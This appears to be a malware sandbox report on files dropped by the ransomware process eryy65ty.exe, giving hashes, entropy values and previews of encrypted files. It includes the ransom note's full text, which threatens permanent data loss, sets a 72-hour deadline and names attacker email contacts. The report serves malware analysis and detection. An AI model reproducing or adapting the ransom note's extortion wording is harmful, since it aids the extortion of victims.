                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.849815362490143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:TrJkYuNFI3IS5G3BrMMW0vZzSCoMgTvi+DXngm:HsFT1EuSF1TvXDXP
                                                                                                    MD5:B879FCF46D134E405FF23073A1CD3A2A
                                                                                                    SHA1:10433583C9B88595052266376E01D2BC95C8B2DA
                                                                                                    SHA-256:514BC0CEEA528ABC564211BDD47E47E1903E82DBD5362BCFC9CA4289108DEE55
                                                                                                    SHA-512:5E23D507094CA5E92D19F9D59BC9010ACE405DD4CA9FDCDE354F3176D89F744E7EA155E7293E739F3CCCB468BE574048F2981D50FD9D7E072343C5850180DC48
                                                                                                    Malicious:false
                                                                                                    Preview:..\.O....hi.T<..gx+.....j#...Q..x.7:`./[.e~.\.~...y}y].>.>..p......;[t.:m.Jun.?.+U..*.~.-e.%..!....z.1..D..|..S..s......7....i#:...-~/.'..V.^.5x!)....2s....cUL.q...p.....P.j.6.Y..6Ml-g...A...v.j..~.n..........>...a...p.P..R)k.&..C..}..c...?...&.S.yX...../.7x..1.a..@..q.D.....`..(.-..&.....`..c.0..0.).J..9.:n...GV[.d.nE..k....G.U65.{nj..9`.)...T.x.U ..c.`..8Y......K..<.c....;..H:..'V..Fb+.&]..s.a.4G..t$....1.9.6......*...~....a......v?@3P.../...l..|:B.(..x..B.v.k..kWh.m......d..4....../.*.?.8....t.U....S2.........U!+H@...o@0.....?..b..G~.z....r.....6.:jq..u....7.G.+.9.W...)xLU5p.E..s.:....4@......l..'4p..jW.....m.?.d..,.#..*.H.././8....Y.Z."...Nk..;h....W........S.j..V..2..X.]!.I.Q.c.H.v..."n............=.*.FZJ...r0..{O.jI.?-.x.C.`.DW.L....9...D|X.Z...b....L5. 7....@..u........U..{..X.<........H.h.%.I.\k...<...IGa.....da;\...y].#.Y*.....4.k_.;..b.gN8....#........d=5...P..>N.....&5..K.~i\[f.p."..K...CN.&.E..R.\,...!>.W..<...W^.{\.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.849815362490143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:TrJkYuNFI3IS5G3BrMMW0vZzSCoMgTvi+DXngm:HsFT1EuSF1TvXDXP
                                                                                                    MD5:B879FCF46D134E405FF23073A1CD3A2A
                                                                                                    SHA1:10433583C9B88595052266376E01D2BC95C8B2DA
                                                                                                    SHA-256:514BC0CEEA528ABC564211BDD47E47E1903E82DBD5362BCFC9CA4289108DEE55
                                                                                                    SHA-512:5E23D507094CA5E92D19F9D59BC9010ACE405DD4CA9FDCDE354F3176D89F744E7EA155E7293E739F3CCCB468BE574048F2981D50FD9D7E072343C5850180DC48
                                                                                                    Malicious:false
                                                                                                    Preview:..\.O....hi.T<..gx+.....j#...Q..x.7:`./[.e~.\.~...y}y].>.>..p......;[t.:m.Jun.?.+U..*.~.-e.%..!....z.1..D..|..S..s......7....i#:...-~/.'..V.^.5x!)....2s....cUL.q...p.....P.j.6.Y..6Ml-g...A...v.j..~.n..........>...a...p.P..R)k.&..C..}..c...?...&.S.yX...../.7x..1.a..@..q.D.....`..(.-..&.....`..c.0..0.).J..9.:n...GV[.d.nE..k....G.U65.{nj..9`.)...T.x.U ..c.`..8Y......K..<.c....;..H:..'V..Fb+.&]..s.a.4G..t$....1.9.6......*...~....a......v?@3P.../...l..|:B.(..x..B.v.k..kWh.m......d..4....../.*.?.8....t.U....S2.........U!+H@...o@0.....?..b..G~.z....r.....6.:jq..u....7.G.+.9.W...)xLU5p.E..s.:....4@......l..'4p..jW.....m.?.d..,.#..*.H.././8....Y.Z."...Nk..;h....W........S.j..V..2..X.]!.I.Q.c.H.v..."n............=.*.FZJ...r0..{O.jI.?-.x.C.`.DW.L....9...D|X.Z...b....L5. 7....@..u........U..{..X.<........H.h.%.I.\k...<...IGa.....da;\...y].#.Y*.....4.k_.;..b.gN8....#........d=5...P..>N.....&5..K.~i\[f.p."..K...CN.&.E..R.\,...!>.W..<...W^.{\.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.838890259300053
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1KJUmacvlyAGLX7Q3CADmfbJXszgimTFin+dgYrRuoiPnlXJhS081H:1KePcvlnVXmfbJXsMdFi0gYrRuVh90H
                                                                                                    MD5:114710DA38C0D6F6B6E394214D0B135B
                                                                                                    SHA1:F8DDC0C830BFEBF6BAE75B378C8F08A4DE8B99B4
                                                                                                    SHA-256:C58C40209E3E3E1229B839A0D2A3C566FF88ECFCF974861089ACD7241EDD59BE
                                                                                                    SHA-512:A5CA4586DF7B9B6982995DF130B698A92D17DF6A958714E19B8176B9BE91A25E57B3A6C08362C9687BE330C6CB659AE932F104440EAD997B4C9BB02E68C0B642
                                                                                                    Malicious:false
                                                                                                    Preview:YT....d..f..#...........:.0s.Z....N...)&.....'._9.....H....SZp...P..B.....C..6.N..c.".N..5.x..._..j....mY?.)\.[q7....J.3%C..l..:..1......$ .$`3..6..Z.LI....1..~.&.....w..}...;..h..7.o.3..T....!=....D-l...,;.xX:...1..o2...?..(8O..0.X...l.po.Xt/..\.AL.;.|H}....i..OR..e.&<c...BC..yf.U&...a1..F1&...me...T:O...(..FH.4C....MY.<.;8.3..NV..|p......"....GC.w\...7..0;...j...X..;........O...k.y..).../..<.)w7....B....wp.....'.o..{.Ql.p9gR\....;...\...}.?...T$_.Y=.v5.....h4....%. ../.HU.@..Nh`..bo.i...C.%.`.(...u....'/.......F..9.&.......].5' ..zY:UF.{.D].@.<.{*......._RIJd.<.n...!>......R.......-..f.s.`..W.E...6v....uW{]....\.,..W.K.D.c.W>.^'.....r}..6..hB.....I.p~.bIso.#....<....j..v^.&rf...W.t...;C...!.J...U.......lYiRt.....`.K...4.....e..]##\...L.B........-.h6.../..h...kHjZ... .....L.2.w.C.>d..>.5.....;....m.@.k..q....9"D....$..;.8 .e.A.U._.o.....c...Ue..d.]n....v...Q...c.w.(.N.:)..K.a.{|.a4....V......._=.Mb:.{......67...K&=.l .."....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.838890259300053
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1KJUmacvlyAGLX7Q3CADmfbJXszgimTFin+dgYrRuoiPnlXJhS081H:1KePcvlnVXmfbJXsMdFi0gYrRuVh90H
                                                                                                    MD5:114710DA38C0D6F6B6E394214D0B135B
                                                                                                    SHA1:F8DDC0C830BFEBF6BAE75B378C8F08A4DE8B99B4
                                                                                                    SHA-256:C58C40209E3E3E1229B839A0D2A3C566FF88ECFCF974861089ACD7241EDD59BE
                                                                                                    SHA-512:A5CA4586DF7B9B6982995DF130B698A92D17DF6A958714E19B8176B9BE91A25E57B3A6C08362C9687BE330C6CB659AE932F104440EAD997B4C9BB02E68C0B642
                                                                                                    Malicious:false
                                                                                                    Preview:YT....d..f..#...........:.0s.Z....N...)&.....'._9.....H....SZp...P..B.....C..6.N..c.".N..5.x..._..j....mY?.)\.[q7....J.3%C..l..:..1......$ .$`3..6..Z.LI....1..~.&.....w..}...;..h..7.o.3..T....!=....D-l...,;.xX:...1..o2...?..(8O..0.X...l.po.Xt/..\.AL.;.|H}....i..OR..e.&<c...BC..yf.U&...a1..F1&...me...T:O...(..FH.4C....MY.<.;8.3..NV..|p......"....GC.w\...7..0;...j...X..;........O...k.y..).../..<.)w7....B....wp.....'.o..{.Ql.p9gR\....;...\...}.?...T$_.Y=.v5.....h4....%. ../.HU.@..Nh`..bo.i...C.%.`.(...u....'/.......F..9.&.......].5' ..zY:UF.{.D].@.<.{*......._RIJd.<.n...!>......R.......-..f.s.`..W.E...6v....uW{]....\.,..W.K.D.c.W>.^'.....r}..6..hB.....I.p~.bIso.#....<....j..v^.&rf...W.t...;C...!.J...U.......lYiRt.....`.K...4.....e..]##\...L.B........-.h6.../..h...kHjZ... .....L.2.w.C.>d..>.5.....;....m.@.k..q....9"D....$..;.8 .e.A.U._.o.....c...Ue..d.]n....v...Q...c.w.(.N.:)..K.a.{|.a4....V......._=.Mb:.{......67...K&=.l .."....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.854780226146903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1c21izs79fZEQhcVt7gxk9UR6L2e5GEpKwRyWz17l2UDITQPiDYDEn9AvQp0yV:1c2Ys79hE103a2TaLdz17pUavQp0i
                                                                                                    MD5:912E85670DE189C1CEB484B7D1606FB7
                                                                                                    SHA1:F0299A8766C80FA2F10346BA8F2FB4E0FE3FD70B
                                                                                                    SHA-256:20C163A9910293B3364F853B367266603AACDBC1DBFB2555FCB1AF05D9A22D7B
                                                                                                    SHA-512:1E034C0AE32474B3F0431AB9B1AD10635DEA8F6933C11AA87F36C4879762C33A29D0355C9D2D5F1FFADFD786261DC12DC9B213C74D3D74D833917AB5F7904221
                                                                                                    Malicious:false
                                                                                                    Preview:.......)....O..zHt.a........}...q..x..n.....@".......,B.\...... h.e.=D.*zV._A.....b.....]5...0v;..AJ:.q..z.iG..c.e.)=;...[.l....R.o]....b.y...#. .Yr..Y[......6....X...X.z:(.&A|#.;_..@.i.....W>.bD..!..k.._.....D<:.../....o..VH=.L"..lxcI.r..P.....K......vkl.......L?...........O...qR.....u....i.....w.C6X.}......:..6r.0.0.8......%..Q...xzy........[..c...B...q.."...8.Z....:...u..A. ..!OY. zI.N/[..,..c..3..o......M#.2....F}[..Uq+.J..+...o.o.;..N...l.......f.[f.........s.]..P.r.Lzs0q.p..i.P..H..{.m..1....?...o.....5@.U...W..>kxiH./}..L4{.......fH..e.f..I..&#...'Q%.E....g..`.'6......9.t.x...((...BA..{u.O..-A......y)u @...+S;.K&...KB.;..{...?...`.Z.l].9....u.(.H.gU.M.i|J...4U..T.~e..d..:.....$...K.'..I..L.._.......L......|..m.g....x@.v-........#.yS...h<.h?.$.cZ.PrJ...d.(UD...;1o..6].......=R%=D.Y...r.E6..mL..&.ii.........l@.%D.1Y6.V%.J..}..KWo.DEW.y[n@t. ^.^..\1F...f.cSV...ef..|....c...J.........:.....C...'>.........5.{..Wld.J@#)..J....I.L.+...B.....@.{
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.854780226146903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1c21izs79fZEQhcVt7gxk9UR6L2e5GEpKwRyWz17l2UDITQPiDYDEn9AvQp0yV:1c2Ys79hE103a2TaLdz17pUavQp0i
                                                                                                    MD5:912E85670DE189C1CEB484B7D1606FB7
                                                                                                    SHA1:F0299A8766C80FA2F10346BA8F2FB4E0FE3FD70B
                                                                                                    SHA-256:20C163A9910293B3364F853B367266603AACDBC1DBFB2555FCB1AF05D9A22D7B
                                                                                                    SHA-512:1E034C0AE32474B3F0431AB9B1AD10635DEA8F6933C11AA87F36C4879762C33A29D0355C9D2D5F1FFADFD786261DC12DC9B213C74D3D74D833917AB5F7904221
                                                                                                    Malicious:false
                                                                                                    Preview:.......)....O..zHt.a........}...q..x..n.....@".......,B.\...... h.e.=D.*zV._A.....b.....]5...0v;..AJ:.q..z.iG..c.e.)=;...[.l....R.o]....b.y...#. .Yr..Y[......6....X...X.z:(.&A|#.;_..@.i.....W>.bD..!..k.._.....D<:.../....o..VH=.L"..lxcI.r..P.....K......vkl.......L?...........O...qR.....u....i.....w.C6X.}......:..6r.0.0.8......%..Q...xzy........[..c...B...q.."...8.Z....:...u..A. ..!OY. zI.N/[..,..c..3..o......M#.2....F}[..Uq+.J..+...o.o.;..N...l.......f.[f.........s.]..P.r.Lzs0q.p..i.P..H..{.m..1....?...o.....5@.U...W..>kxiH./}..L4{.......fH..e.f..I..&#...'Q%.E....g..`.'6......9.t.x...((...BA..{u.O..-A......y)u @...+S;.K&...KB.;..{...?...`.Z.l].9....u.(.H.gU.M.i|J...4U..T.~e..d..:.....$...K.'..I..L.._.......L......|..m.g....x@.v-........#.yS...h<.h?.$.cZ.PrJ...d.(UD...;1o..6].......=R%=D.Y...r.E6..mL..&.ii.........l@.%D.1Y6.V%.J..}..KWo.DEW.y[n@t. ^.^..\1F...f.cSV...ef..|....c...J.........:.....C...'>.........5.{..Wld.J@#)..J....I.L.+...B.....@.{
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.831606665096791
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:9b9vklYaNDXLOmx+NSz6RfseBfSKm/Wd8Z26xVwFySXqufOyGzl6tvBjWnIFj:9wNc7Rfs0SKk7Z26xiqTyGzl8jhJ
                                                                                                    MD5:B1C3AB67E7EE27E9D1B408ED68B16716
                                                                                                    SHA1:6293C920489A8E9924ADFB18E3C384C19BABBCCA
                                                                                                    SHA-256:BA0F55D8D3BD0FA45ACFE78175645BC801A947978E4AC3C1912EF0EBBCC72F61
                                                                                                    SHA-512:3BD80FED6FBEFC39802832DB253AAC8D00A75339B9D01646A2D8DEE67058EE33B24B530047F8B4674F2CD33A57FB73A195516FC2339D4CA3CA790A23607C0400
                                                                                                    Malicious:false
                                                                                                    Preview:....+/...V..X""a......_..<.!.8.0YE..}..n. ..S+4z ...L..2..U..\x.....H..].+...c~.....F.....3..E...R....B)..?..*J..|.jQ^..pS.....J.......5.uo...-w..m.o..z...,GeE=.-..!..R....Ep........A.2.....#..A.d.x.G.~%<]p.| .....v.].^.$. .K~YTya...S..G.(...@.,.-b....s....(N.Ov.8...Yz...m...hH<.1...2oJ.'....(.c.A.{.].1.|..T..6Y...J.V.L.....y..H.[.d.2....L.....T.w6._.,.\|...$3aK...h...O..v..HvC.....'hx..%....H....^.......,..4,.......7[g....J...|.y..SX.._..|....`.....%@..q.^.xS2.[.:4..........#w...._.#<.XVF....,..._{...P....+$.p..,..R..fF.1R..8."...a]......"..6.Z\..R.=....jZ6....i...7..b..uTF....1....@.0.....w(..:.$.y-....*.....A3.7.s..GE..g../2Q.]m2......R.H?...(;.oS9...........}C.%n....l..1\.E.^...?.F...).+.c.{BB"T..FPXy.f.^7.8.....Ve...j...T[u..|....4..Ilt...=m.....:....j...jr....=g...vO[a\6}y...t=.u-.....9m.Q...K..b.......8..T.K7@.. ..IC..~...hH. .S?_.Y.E.......[B.r.N.....OU...S..|..d....[n.......g...R......k....}.?.......M....J..g;.......{.?.K:9.g..C....._.Y
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.831606665096791
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:9b9vklYaNDXLOmx+NSz6RfseBfSKm/Wd8Z26xVwFySXqufOyGzl6tvBjWnIFj:9wNc7Rfs0SKk7Z26xiqTyGzl8jhJ
                                                                                                    MD5:B1C3AB67E7EE27E9D1B408ED68B16716
                                                                                                    SHA1:6293C920489A8E9924ADFB18E3C384C19BABBCCA
                                                                                                    SHA-256:BA0F55D8D3BD0FA45ACFE78175645BC801A947978E4AC3C1912EF0EBBCC72F61
                                                                                                    SHA-512:3BD80FED6FBEFC39802832DB253AAC8D00A75339B9D01646A2D8DEE67058EE33B24B530047F8B4674F2CD33A57FB73A195516FC2339D4CA3CA790A23607C0400
                                                                                                    Malicious:false
                                                                                                    Preview:....+/...V..X""a......_..<.!.8.0YE..}..n. ..S+4z ...L..2..U..\x.....H..].+...c~.....F.....3..E...R....B)..?..*J..|.jQ^..pS.....J.......5.uo...-w..m.o..z...,GeE=.-..!..R....Ep........A.2.....#..A.d.x.G.~%<]p.| .....v.].^.$. .K~YTya...S..G.(...@.,.-b....s....(N.Ov.8...Yz...m...hH<.1...2oJ.'....(.c.A.{.].1.|..T..6Y...J.V.L.....y..H.[.d.2....L.....T.w6._.,.\|...$3aK...h...O..v..HvC.....'hx..%....H....^.......,..4,.......7[g....J...|.y..SX.._..|....`.....%@..q.^.xS2.[.:4..........#w...._.#<.XVF....,..._{...P....+$.p..,..R..fF.1R..8."...a]......"..6.Z\..R.=....jZ6....i...7..b..uTF....1....@.0.....w(..:.$.y-....*.....A3.7.s..GE..g../2Q.]m2......R.H?...(;.oS9...........}C.%n....l..1\.E.^...?.F...).+.c.{BB"T..FPXy.f.^7.8.....Ve...j...T[u..|....4..Ilt...=m.....:....j...jr....=g...vO[a\6}y...t=.u-.....9m.Q...K..b.......8..T.K7@.. ..IC..~...hH. .S?_.Y.E.......[B.r.N.....OU...S..|..d....[n.......g...R......k....}.?.......M....J..g;.......{.?.K:9.g..C....._.Y
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.829830694772968
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ntFJ2hku6V6IfjjE/lXMpvH+Cwp0jjrlV7v10hMyNI11cTNhUpcxmyPrS:V2r6ACMcpvH+CrPrP76bUSTvwchrS
                                                                                                    MD5:DB95900735D8CF0E691FBBF2708CEA16
                                                                                                    SHA1:94F6BE619439648111A0655A2AD2CE04856B7B30
                                                                                                    SHA-256:F9DBC7726F54B4485F7DC05FF7CD89674EEA27C1EA315A34F48493A7C01869F9
                                                                                                    SHA-512:80431F146CC1071AFD80FCD8D2002ACB2734EC7B552E1608479998708D9B4F14E010D5D93584DC72CDE5BFC33D6A25AEABCE01EB56325CAA3439CABDF01BCD54
                                                                                                    Malicious:false
                                                                                                    Preview:S.......u`.K..n~..2.|m...v...I. .!}s.)bt..h..8d..c.....g...".u%.@`.5...i..7...s..r.y.m}i..).A...I.j.._.nm..,.4t.....L.5...|.).TN....v.#.K.UU. ..\..f@. .$..u8.....9.SR..r6`...}[A.8.|...<...i4.8.O.x.X...~.h..S.7...9u...H. ....._h...}..10..4...j.....j..c.:......1.&.R/..f...../\@.0........0.Q.S.g.G.X.-....IQ`...TH.<........^.....n.m..{..lx\......`... F,...w.%."...>...".g.C=...fH......H..ig....4.....Gu.e......~./..0.......e.\3..1Y..KJ.....#.....9.FX'.E..........4l-....!Z.R.P.....>...uO...F.EQ9.@........B.'....+..!y.r...IJ..U.c.+..F..[....Q ../<`K.i._L...x.!..-.vOwd..S...bA.S...L.aEu/.t5..o...8*K....D.3...<I,...s0..-...o.]..g...fcXh....5..i...>....,UQs....6R....y.K.|..H..9O...x.........V....!....R ........j..:..;....7.`....X...o.z..P_.+/...\...._.g.A....!%.!.1.c.9...../..j6..h..{.8.....,...~.PT.C.!..f.....y.g ZK...F....&.i..yIgG....0EMf....]w..F.k..g8.>..k....bG..Lk.d....@..G.4.....P...7..^..6z.......!.o...qS^.{R*p...:.R..R.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.829830694772968
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ntFJ2hku6V6IfjjE/lXMpvH+Cwp0jjrlV7v10hMyNI11cTNhUpcxmyPrS:V2r6ACMcpvH+CrPrP76bUSTvwchrS
                                                                                                    MD5:DB95900735D8CF0E691FBBF2708CEA16
                                                                                                    SHA1:94F6BE619439648111A0655A2AD2CE04856B7B30
                                                                                                    SHA-256:F9DBC7726F54B4485F7DC05FF7CD89674EEA27C1EA315A34F48493A7C01869F9
                                                                                                    SHA-512:80431F146CC1071AFD80FCD8D2002ACB2734EC7B552E1608479998708D9B4F14E010D5D93584DC72CDE5BFC33D6A25AEABCE01EB56325CAA3439CABDF01BCD54
                                                                                                    Malicious:false
                                                                                                    Preview:S.......u`.K..n~..2.|m...v...I. .!}s.)bt..h..8d..c.....g...".u%.@`.5...i..7...s..r.y.m}i..).A...I.j.._.nm..,.4t.....L.5...|.).TN....v.#.K.UU. ..\..f@. .$..u8.....9.SR..r6`...}[A.8.|...<...i4.8.O.x.X...~.h..S.7...9u...H. ....._h...}..10..4...j.....j..c.:......1.&.R/..f...../\@.0........0.Q.S.g.G.X.-....IQ`...TH.<........^.....n.m..{..lx\......`... F,...w.%."...>...".g.C=...fH......H..ig....4.....Gu.e......~./..0.......e.\3..1Y..KJ.....#.....9.FX'.E..........4l-....!Z.R.P.....>...uO...F.EQ9.@........B.'....+..!y.r...IJ..U.c.+..F..[....Q ../<`K.i._L...x.!..-.vOwd..S...bA.S...L.aEu/.t5..o...8*K....D.3...<I,...s0..-...o.]..g...fcXh....5..i...>....,UQs....6R....y.K.|..H..9O...x.........V....!....R ........j..:..;....7.`....X...o.z..P_.+/...\...._.g.A....!%.!.1.c.9...../..j6..h..{.8.....,...~.PT.C.!..f.....y.g ZK...F....&.i..yIgG....0EMf....]w..F.k..g8.>..k....bG..Lk.d....@..G.4.....P...7..^..6z.......!.o...qS^.{R*p...:.R..R.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.850965793805682
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gQ3juq+bOh79zFbG4OJfQQbvzxg5Kdtm+KjdSfj+Du0:lh39hSbHzxgwdqdSiDT
                                                                                                    MD5:0FD8C68E6E25BB00C836D7AC3E4EC54E
                                                                                                    SHA1:CE47FEFD67DAF83B134DBE9900387422DFF88B0A
                                                                                                    SHA-256:EEA378D94DF73C3F4A0CC6FD72C690095A8A01526E09AC7373F5B2C6B3168E30
                                                                                                    SHA-512:54DA5E6D8259D43A1A7E7441A6C8ECEFD9F977AA5E1C07057EE32E15A779DE15004DEDD20DC5871F87C892F13CC1CDDECFA76BFD99FC6FF31635EDB19BF28532
                                                                                                    Malicious:false
                                                                                                    Preview:O..;.(....o7.>.[..{.Y.........B...B..._..(..............7.e.....z.M..;.5..!..v.qa..#.0f...4.vE.b..r. .F*c.MR7.V.),.>.......~.{.*.5...X.....;..8.KT.<......%..-o8..7....#....$....?!.L..C...#..=..M....mS.+3?a.x...<6B.J..X....<..v....$.6.E....C....9RiG.|.....N.f.~...@O./Lo.....u..l.d.....Zb..z....#..2..P.).{.j.... ....X"`.....b~..-nnE7e.."..\@.1.&....Q5.s.<..."....ASSW....d[...4.'"K.e".ot.....n,M...^E{..*.aH.......=I..P..B.}..G..... .ix...,1u..A?{y.`h......M.Yk.......T5he...Jt.i .-.b.......B.j.?.d.@..]-A.-.M.|..DGC^U...s.*>....)!.:ME.:.1z.$.T.H....v3..#..MWO..E.5..;.....Ky.C.q..A.a.Q....O....5.-..tsia..{0.mHj..if.l...U7.DA1.#l.92.-........c.VW:S.o..C.K.4^MLW.;...t....(...~Q.i...1;.....g......+.s.;.:...q...i...\Y.cc.N+.W.9.Cax...eecGv....j.....s.=!.....s........c....O.....%..^;..4.,.0l.p4...F..|I.|..*.y.x.k>.(...g.tJ;..}_"~.2.Ts1....BD. .....s@Z..D.e.S...T.*d.4..w.f...Z..Cvs4I..,.V!X.v{.xG.t.Q. U '...c}.p.....K....gx..~... ..fc*.....&.....,e+l-...I
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.850965793805682
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gQ3juq+bOh79zFbG4OJfQQbvzxg5Kdtm+KjdSfj+Du0:lh39hSbHzxgwdqdSiDT
                                                                                                    MD5:0FD8C68E6E25BB00C836D7AC3E4EC54E
                                                                                                    SHA1:CE47FEFD67DAF83B134DBE9900387422DFF88B0A
                                                                                                    SHA-256:EEA378D94DF73C3F4A0CC6FD72C690095A8A01526E09AC7373F5B2C6B3168E30
                                                                                                    SHA-512:54DA5E6D8259D43A1A7E7441A6C8ECEFD9F977AA5E1C07057EE32E15A779DE15004DEDD20DC5871F87C892F13CC1CDDECFA76BFD99FC6FF31635EDB19BF28532
                                                                                                    Malicious:false
                                                                                                    Preview:O..;.(....o7.>.[..{.Y.........B...B..._..(..............7.e.....z.M..;.5..!..v.qa..#.0f...4.vE.b..r. .F*c.MR7.V.),.>.......~.{.*.5...X.....;..8.KT.<......%..-o8..7....#....$....?!.L..C...#..=..M....mS.+3?a.x...<6B.J..X....<..v....$.6.E....C....9RiG.|.....N.f.~...@O./Lo.....u..l.d.....Zb..z....#..2..P.).{.j.... ....X"`.....b~..-nnE7e.."..\@.1.&....Q5.s.<..."....ASSW....d[...4.'"K.e".ot.....n,M...^E{..*.aH.......=I..P..B.}..G..... .ix...,1u..A?{y.`h......M.Yk.......T5he...Jt.i .-.b.......B.j.?.d.@..]-A.-.M.|..DGC^U...s.*>....)!.:ME.:.1z.$.T.H....v3..#..MWO..E.5..;.....Ky.C.q..A.a.Q....O....5.-..tsia..{0.mHj..if.l...U7.DA1.#l.92.-........c.VW:S.o..C.K.4^MLW.;...t....(...~Q.i...1;.....g......+.s.;.:...q...i...\Y.cc.N+.W.9.Cax...eecGv....j.....s.=!.....s........c....O.....%..^;..4.,.0l.p4...F..|I.|..*.y.x.k>.(...g.tJ;..}_"~.2.Ts1....BD. .....s@Z..D.e.S...T.*d.4..w.f...Z..Cvs4I..,.V!X.v{.xG.t.Q. U '...c}.p.....K....gx..~... ..fc*.....&.....,e+l-...I
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8430906568377665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:scSAlUdD8qnkq8wes2wlXSVeJxOght13cf37RTvOnvwC7o4+S2A7atI8H:scADyq6s2zeJjg317DC7o4gEad
                                                                                                    MD5:69A6F3BBA53F5B97519DFEC7C7EE6886
                                                                                                    SHA1:AEB90922270D6EE8F5B8F255FC838B34901467A2
                                                                                                    SHA-256:C0FBCB452C61452D80C9D69E5DD1FB21287FA00E67B27C40C1104BCEDF0A7D44
                                                                                                    SHA-512:B4B3EE7949954C25322DDAB76E4569C496B358F17F9222D2813CE15EE9D8F19692126305FD3C8B70B0FD4D72FC3121506AA8CCEED8E00ABC7F334DC12D734519
                                                                                                    Malicious:false
